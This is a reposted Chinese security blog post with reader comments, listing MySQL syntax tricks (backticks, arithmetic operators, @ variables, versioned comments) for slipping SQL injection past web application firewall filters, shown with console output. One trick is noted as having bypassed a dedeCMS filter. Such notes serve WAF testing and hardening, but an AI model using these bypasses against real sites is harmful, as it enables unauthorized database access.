记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

waf 绕过的技巧,SQL 注入中绕过 waf 的技巧

2013-06-17 19:33

2013/05/31 17:41 | livers

研究过国内外的waf。分享一些 奇淫绝技。

一些大家都了解的技巧如:

/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM

不再重造轮子。

Mysql

tips1: 神奇的 ` (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`()
-> ;
+----------------------+
| `version`() |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)

一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)

usage : where id ='0'`'xxxxcomment on.

tips2:神奇的- + .

mysql> select id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)

(有些人不是一直在说关键字怎么过?过滤一个from ... 就是这样连起来过)

tips3: @

mysql> select@^1.from qs_admins;
+------|+
| @^1. |
+------|+
| NULL |
+------|+

这个是bypass 曾经dedeCMS filter .

或者这样也是ok.

tips4:mysql function() as xxx 也可以不用as 和空格

mysql> select-count(id)test from qs_admins;
+------|+
| test |
+------|+
| -1 |
+------|+
1 row in set (0.00 sec)

tips5:/*![>5000]*/ 新构造 版本号(这个可能有些过时了。)

mysql> /\*!40000select\*/ id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)

先分享这么多,哈。

[原文地址]

一些讨论:

Lenwood | 2013/06/01 10:35 | #

能想出这些方法的人思维真心变态。

livers | 2013/06/01 11:23 | #

怪不得我心理测试都不正常。。哈哈

xsser | 2013/06/01 11:41 | #

一段可以用于防火墙安全测试的fuzz程序 http://zone.wooyun.org/content/1798 用这种方法可以找出好多诡异的不影响语法解析但是影响正则判断的字符

applychen | 2013/06/05 13:35 | #

真心不错~~

知识来源: lcx.cc/?i=3579

阅读:71413 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“waf 绕过的技巧,SQL 注入中绕过 waf 的技巧”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云